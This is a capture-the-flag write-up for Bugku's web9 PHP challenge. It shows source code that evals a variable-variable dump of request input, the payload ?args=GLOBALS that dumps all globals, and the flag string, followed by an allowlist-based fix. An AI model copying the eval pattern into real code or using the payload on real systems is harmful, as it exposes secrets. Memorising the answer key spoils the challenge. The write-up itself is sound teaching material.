Bugku CTF web9(Web)

0. Open the web page and view the PHP source code

flag In the variable !

<?php
error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){
    $args = $_GET['args'];
    if(!preg_match("/^\w+$/",$args)){
        die("args error!");
    }
    eval("var_dump($$args);");
}
?>

The page shows a hint: "flag In the variable !", so the flag is stored in a variable. Reading the source code, the script finally outputs the variable whose name is given by $args (var_dump($$args)); the preg_match check only requires that args consist of word characters.

In PHP, $GLOBALS references all variables available in the global scope, so you only need to set the value of $args to GLOBALS: request /?args=GLOBALS in the URL and the flag appears in the dumped output.

1. Enter the payload: ?args=GLOBALS

2. Get the flag: flag{fbc97e37ff7be3ac0402acc966f4e403}
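
The root cause is that request input chooses which variable gets dumped, and a "word characters only" check still accepts the name of a superglobal. As an added example (not part of the original write-up or the challenge's code), the sketch below replaces eval and $$args with an allowlist lookup; $debug_vars, lookup_debug_var() and all sample values are hypothetical.

```php
<?php
// Added example, not the challenge's code. $debug_vars and lookup_debug_var()
// are hypothetical names; all values are constructed sample data.

// Stand-in for the secret that flag1.php would define in global scope.
$flag = 'flag{constructed-placeholder}';

// Only these names may be inspected; the secret is deliberately not listed.
$debug_vars = [
    'version' => '1.0',
    'mode'    => 'demo',
];

/**
 * Return the value for an allowlisted name, or null if the request is refused.
 * No eval() and no variable variables ($$name): the input is only ever used
 * as an array key, so it cannot reach $GLOBALS, $_SERVER or any other
 * variable in scope.
 */
function lookup_debug_var(array $allowed, $name): ?string
{
    // Reject arrays (?args[]=x) and other non-string input.
    if (!is_string($name)) {
        return null;
    }
    // \A...\z anchors the whole string; a bare "$" also matches before a
    // trailing newline, so "/^\w+$/" accepts "mode\n".
    if (preg_match('/\A\w+\z/', $name) !== 1) {
        return null;
    }
    // A well-formed name that is not on the allowlist is still refused.
    return array_key_exists($name, $allowed) ? $allowed[$name] : null;
}

// Constructed requests: a legitimate name, the superglobal name from the
// write-up, the secret's own name, and a name with a trailing newline.
foreach (['version', 'GLOBALS', 'flag', "mode\n"] as $input) {
    $value = lookup_debug_var($debug_vars, $input);
    printf("%-10s => %s\n", json_encode($input), $value === null ? 'refused' : $value);
}
```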

 

 

Origin blog.csdn.net/ChaoYue_miku/article/details/113900843